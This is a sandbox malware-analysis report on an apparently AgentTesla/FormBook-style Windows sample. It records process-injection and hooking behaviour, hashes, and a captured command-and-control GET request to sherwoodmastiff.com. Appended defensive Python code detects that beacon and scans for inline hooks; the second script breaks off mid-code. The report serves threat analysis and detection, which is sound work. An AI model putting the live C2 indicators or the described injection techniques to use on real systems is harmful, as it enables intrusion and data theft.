            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            -> explorer.exe (injected)
                 DNS/IP: sherwoodmastiff.com 160.153.136.3, 49816, 80 GODADDY-AMSDE United States; www.sherwoodmastiff.com; www.kingtreemusic.com
                 Signatures: System process connects to network (likely due to code injection or exploit)
                 -> WWAHost.exe (started)
                      Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                      -> cmd.exe (started)
                           -> conhost.exe (started)
                 -> autoconv.exe (started)
       -> EH5ro3Hyug.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
EH5ro3Hyug.exe | 32% | Virustotal |
EH5ro3Hyug.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
6.2.EH5ro3Hyug.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.fontbureau.comF | 0% | URL Reputation | safe
http://www.rspb.org.uk/wildlife/birdguide/name/ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.sherwoodmastiff.com/hht8/?V2=UdJvmcuMRIp/sNw0TNsoQAu26okuAPtZrfHvhR73KElz+11bxdQbtsNL5cLMDPcOzFi3&5j=SVeDzJKXh | 0% | Avira URL Cloud | safe
http://www.fontbureau.comma | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
www.eastwestasia-thailand.com/hht8/ | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
sherwoodmastiff.com | 160.153.136.3 | true | true | | unknown
www.sherwoodmastiff.com | unknown | unknown | true | | unknown
www.kingtreemusic.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.sherwoodmastiff.com/hht8/?V2=UdJvmcuMRIp/sNw0TNsoQAu26okuAPtZrfHvhR73KElz+11bxdQbtsNL5cLMDPcOzFi3&5j=SVeDzJKXh | true | Avira URL Cloud: safe | unknown
www.eastwestasia-thailand.com/hht8/ | true | Avira URL Cloud: safe | low

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comF | EH5ro3Hyug.exe, 00000000.00000002.689041915.00000000012F7000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://www.rspb.org.uk/wildlife/birdguide/name/ | EH5ro3Hyug.exe | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comma | EH5ro3Hyug.exe, 00000000.00000002.689041915.00000000012F7000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | | high
http://www.goodfont.co.kr | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | | high
http://www.fonts.com | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | | high
http://www.sandoll.co.kr | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                                      Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
160.153.136.3 | sherwoodmastiff.com | United States | 21501 | GODADDY-AMSDE | true

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:491359
                                      Start date:27.09.2021
                                      Start time:14:06:45
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 11m 43s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:EH5ro3Hyug (renamed file extension from none to exe)
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:21
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@10/1@2/1
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 15% (good quality ratio 13.6%)
                                      • Quality average: 73.3%
                                      • Quality standard deviation: 31.4%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      Warnings:
                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.82.210.154, 20.54.110.249, 23.0.174.200, 23.0.174.185, 40.112.88.60, 23.10.249.26, 23.10.249.43, 20.82.209.183
                                      • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                      • Not all processes were analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                      Simulations

                                      Behavior and APIs

                                      Time      Type             Description
                                      14:07:50  API Interceptor  1x Sleep call for process: EH5ro3Hyug.exe modified

                                      Joe Sandbox View / Context

                                      IPs


                                      Domains

                                      No context

                                      ASN


                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EH5ro3Hyug.exe.log
                                      Process:C:\Users\user\Desktop\EH5ro3Hyug.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1309
                                      Entropy (8bit):5.3528008810928345
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84aE4Ks:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzg
                                      MD5:542338C5A30B02E372089FECDC54D607
                                      SHA1:6FAD29FF14686FC847B160E876C1E078333F6DCB
                                      SHA-256:6CEA4E70947B962733754346CE49553BE3FB6E1FB3949C29EC22FA9CA4B7E7B6
                                      SHA-512:FE4431305A8958C4940EB4AC65723A38DA6057C3D30F789C6EDDEBA8962B62E9C0583254E74740855027CF3AE9315E3001A7EEB54168073ED0D2AB9B1F05503A
                                      Malicious:true
                                      Reputation:moderate, very likely benign file
                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):6.790198320706062
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:EH5ro3Hyug.exe
                                      File size:860672
                                      MD5:dff3bf025dcd487a2f0fb22b4ccf8998
                                      SHA1:1ff59c9410fb281ffc8d2c3c1fc3268eacd5dba1
                                      SHA256:230b56b1d072725eff3a0e100515ba924377c9f0a79308bbfa3123269ee23d56
                                      SHA512:088c3395be1bf0ef0de2135d0588c6106c5a5f279b9b40761f58298db8368a31107820dd621d66d2656b18417bf06e025a8cd3700075daeaa393ab5a62b5e899
                                      SSDEEP:12288:JIR5so4GVamo1M3de8zo70QuynMwr/amKEDm4fgGvSw24MLGhovWdo9S7LCn1tNP:3fqIFUF+W2L0YvUrzmOSha+u
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0.................. ........@.. ....................................@................................

                                      File Icon

                                      Icon Hash:138e8eccece8cccc

                                      Static PE Info

                                      General

                                      Entrypoint:0x4ba7d2
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x61511619 [Mon Sep 27 00:53:45 2021 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:v4.0.30319
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]

                                      Data Directories

                                      Name                                  Virtual Address  Virtual Size  Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT          0xba780          0x4f          .text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0xbc000          0x1944c       .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0xd6000          0xc           .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                      Sections

                                      Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                      .text   0x2000           0xb87d8       0xb8800   False     0.678409235264   data       7.04755215007   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rsrc   0xbc000          0x1944c       0x19600   False     0.391750692734   data       4.29647851076   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc  0xd6000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      Name           RVA      Size     Type                                                                                                                                            Language  Country
                                      RT_ICON        0xbc180  0x10828  dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                      RT_ICON        0xcc9b8  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                      RT_ICON        0xd0bf0  0x25a8   data
                                      RT_ICON        0xd31a8  0x10a8   data
                                      RT_ICON        0xd4260  0x468    GLS_BINARY_LSB_FIRST
                                      RT_GROUP_ICON  0xd46d8  0x4c     data
                                      RT_VERSION     0xd4734  0x354    data
                                      RT_MANIFEST    0xd4a98  0x9b0    XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                      Imports

                                      DLL          Import
                                      mscoree.dll  _CorExeMain

                                      Version Infos

                                      Description       Data
                                      Translation       0x0000 0x04b0
                                      LegalCopyright    Copyright F@Soft
                                      Assembly Version  1.0.6.2
                                      InternalName      EventManifestOptio.exe
                                      FileVersion       1.0.6.0
                                      CompanyName       F@Soft
                                      LegalTrademarks
                                      Comments
                                      ProductName       Darwin AW
                                      ProductVersion    1.0.6.0
                                      FileDescription   Darwin AW
                                      OriginalFilename  EventManifestOptio.exe

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      Timestamp                             Source Port  Dest Port  Source IP      Dest IP
                                      Sep 27, 2021 14:09:05.851680040 CEST  49816        80         192.168.2.4    160.153.136.3
                                      Sep 27, 2021 14:09:05.875760078 CEST  80           49816      160.153.136.3  192.168.2.4
                                      Sep 27, 2021 14:09:05.875880003 CEST  49816        80         192.168.2.4    160.153.136.3
                                      Sep 27, 2021 14:09:05.876187086 CEST  49816        80         192.168.2.4    160.153.136.3
                                      Sep 27, 2021 14:09:05.902435064 CEST  80           49816      160.153.136.3  192.168.2.4
                                      Sep 27, 2021 14:09:05.902458906 CEST  80           49816      160.153.136.3  192.168.2.4
                                      Sep 27, 2021 14:09:05.902467966 CEST  80           49816      160.153.136.3  192.168.2.4
                                      Sep 27, 2021 14:09:05.902844906 CEST  49816        80         192.168.2.4    160.153.136.3
                                      Sep 27, 2021 14:09:05.903044939 CEST  49816        80         192.168.2.4    160.153.136.3
                                      Sep 27, 2021 14:09:05.928517103 CEST  80           49816      160.153.136.3  192.168.2.4

                                      UDP Packets

                                      Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                                      Sep 27, 2021 14:07:36.096740007 CEST  49257        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:07:36.116242886 CEST  53           49257      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:08:07.315135956 CEST  62389        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:08:07.329541922 CEST  53           62389      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:08:26.762648106 CEST  49910        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:08:26.839148998 CEST  53           49910      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:08:27.530270100 CEST  55854        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:08:27.551716089 CEST  53           55854      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:08:28.074493885 CEST  64549        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:08:28.087434053 CEST  53           64549      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:08:28.710818052 CEST  63153        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:08:28.724102020 CEST  53           63153      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:08:28.742738962 CEST  52991        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:08:28.769083977 CEST  53           52991      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:08:29.040502071 CEST  53700        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:08:29.143783092 CEST  53           53700      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:08:29.608655930 CEST  51726        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:08:29.670341015 CEST  53           51726      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:08:30.186027050 CEST  56794        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:08:30.199626923 CEST  53           56794      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:08:30.651643991 CEST  56534        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:08:30.664815903 CEST  53           56534      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:08:32.006190062 CEST  56627        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:08:32.020279884 CEST  53           56627      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:08:32.689856052 CEST  56621        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:08:32.702795029 CEST  53           56621      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:08:33.107525110 CEST  63116        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:08:33.186486959 CEST  53           63116      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:08:43.796036005 CEST  64078        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:08:43.814069986 CEST  53           64078      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:09:05.803047895 CEST  64801        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:09:05.840178967 CEST  53           64801      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:09:17.229307890 CEST  61721        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:09:17.260358095 CEST  53           61721      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:09:18.574887037 CEST  51255        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:09:18.603625059 CEST  53           51255      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:09:24.108165026 CEST  61522        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:09:24.331362009 CEST  53           61522      8.8.8.8      192.168.2.4
                                      Sep 27, 2021 14:09:50.587238073 CEST  52337        53         192.168.2.4  8.8.8.8
                                      Sep 27, 2021 14:09:50.620434999 CEST  53           52337      8.8.8.8      192.168.2.4

                                      DNS Queries

                                      Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class
                                      Sep 27, 2021 14:09:05.803047895 CEST  192.168.2.4  8.8.8.8  0xc3f5    Standard query (0)  www.sherwoodmastiff.com  A (IP address)  IN (0x0001)
                                      Sep 27, 2021 14:09:24.108165026 CEST  192.168.2.4  8.8.8.8  0x48b9    Standard query (0)  www.kingtreemusic.com    A (IP address)  IN (0x0001)

                                      DNS Answers

                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                      Sep 27, 2021 14:09:05.840178967 CEST | 8.8.8.8 | 192.168.2.4 | 0xc3f5 | No error (0) | www.sherwoodmastiff.com | sherwoodmastiff.com | (none) | CNAME (Canonical name) | IN (0x0001)
                                      Sep 27, 2021 14:09:05.840178967 CEST | 8.8.8.8 | 192.168.2.4 | 0xc3f5 | No error (0) | sherwoodmastiff.com | (none) | 160.153.136.3 | A (IP address) | IN (0x0001)
                                      Sep 27, 2021 14:09:24.331362009 CEST | 8.8.8.8 | 192.168.2.4 | 0x48b9 | Name error (3) | www.kingtreemusic.com | none | none | A (IP address) | IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.sherwoodmastiff.com

                                      HTTP Packets

                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      0 | 192.168.2.4 | 49816 | 160.153.136.3 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Sep 27, 2021 14:09:05.876187086 CEST | 5733 | OUT | GET /hht8/?V2=UdJvmcuMRIp/sNw0TNsoQAu26okuAPtZrfHvhR73KElz+11bxdQbtsNL5cLMDPcOzFi3&5j=SVeDzJKXh HTTP/1.1
                                      Host: www.sherwoodmastiff.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Sep 27, 2021 14:09:05.902458906 CEST | 5734 | IN | HTTP/1.1 400 Bad Request
                                      Connection: close
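Added example (not part of the sandbox report): a small Python detector that parses raw HTTP request text such as the explorer.exe request above and scores it against the traits visible there, namely a GET with no User-Agent header, a single short alphanumeric path directory, two short query keys, a base64-like query value and Connection: close. The scoring threshold, the trait names and the benign contrast request are the author's assumptions, not a published FormBook rule.

```python
"""Score raw HTTP requests against the beacon shape captured above."""
import re
from urllib.parse import urlsplit

# Shape of the captured request line: one short alphanumeric directory
_PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")
# Base64-like blob such as the report's V2= value
_B64ISH_RE = re.compile(r"^[A-Za-z0-9+/=_-]{16,}$")


def _parse_query(query: str) -> dict:
    """Split k=v pairs by hand: parse_qsl() would turn '+' into a space
    and break the base64 check on values like the captured one."""
    out = {}
    for kv in query.split("&"):
        if kv:
            k, _, v = kv.partition("=")
            out[k] = v
    return out


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request (CRLF or LF separated) into its parts."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # end of the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "path": parts.path,
            "query": _parse_query(parts.query), "headers": headers}


def beacon_indicators(req: dict) -> list:
    """Names of every trait of the captured explorer.exe request present in req."""
    hits = []
    if req["method"] == "GET" and "user-agent" not in req["headers"]:
        hits.append("no_user_agent")
    if _PATH_RE.match(req["path"]):
        hits.append("short_random_dir")
    q = req["query"]
    if len(q) == 2 and all(len(k) <= 2 for k in q):
        hits.append("two_short_query_keys")
    if any(_B64ISH_RE.match(v) for v in q.values()):
        hits.append("base64_like_value")
    if req["headers"].get("connection", "").lower() == "close":
        hits.append("connection_close")
    return hits


def is_formbook_beacon(raw: str, min_hits: int = 4) -> bool:
    """Four of the five traits is an assumed threshold, tune it to your traffic."""
    return len(beacon_indicators(parse_request(raw))) >= min_hits


# The request captured in the report (explorer.exe -> www.sherwoodmastiff.com)
CAPTURED = (
    "GET /hht8/?V2=UdJvmcuMRIp/sNw0TNsoQAu26okuAPtZrfHvhR73KElz+11bxdQbtsNL5cLMDPcOzFi3&5j=SVeDzJKXh HTTP/1.1\r\n"
    "Host: www.sherwoodmastiff.com\r\n"
    "Connection: close\r\n\r\n"
)
# Constructed benign request for contrast (not from the report)
BENIGN = (
    "GET /api/v1/status?format=json HTTP/1.1\r\n"
    "Host: updates.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Connection: keep-alive\r\n\r\n"
)

if __name__ == "__main__":
    for label, raw in (("captured", CAPTURED), ("benign", BENIGN)):
        print(label, beacon_indicators(parse_request(raw)), is_formbook_beacon(raw))
```

The captured request trips all five traits while the constructed benign one trips none; the server's 400 Bad Request reply (the panel was not serving the path at the time) does not change the verdict, because the indicators are computed from the client side only.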


                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function Name | Hook Type | Active in Processes
                                      PeekMessageA | INLINE | explorer.exe
                                      PeekMessageW | INLINE | explorer.exe
                                      GetMessageW | INLINE | explorer.exe
                                      GetMessageA | INLINE | explorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                      Function Name | Hook Type | New Data
                                      PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8B 0xBE 0xE9
                                      PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x83 0x3E 0xE9
                                      GetMessageW | INLINE | 0x48 0x8B 0xB8 0x83 0x3E 0xE9
                                      GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8B 0xBE 0xE9
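Added example (not from the report): how a user-mode hook scanner turns a prologue like the "New Data" bytes above into a verdict. It compares the in-memory bytes of an export with the on-disk copy and, when they differ, decodes the leading control transfer (jmp rel32, mov rax/jmp rax, push/ret) and checks whether its target lies outside the module's mapped range. The user32 address range, the function addresses and the byte strings are constructed; the report does not show where the hooks jump, so the 0x6BFF000 destination is chosen only to resemble the explorer.exe region its Yara matches point at.

```python
"""Decide whether an export's prologue has been redirected by an inline hook."""
import struct

MASK64 = (1 << 64) - 1


def decode_redirect(prologue: bytes, func_va: int):
    """Return (kind, target_va) when the prologue opens with an unconditional
    transfer of the kind hooks plant; otherwise (None, None).
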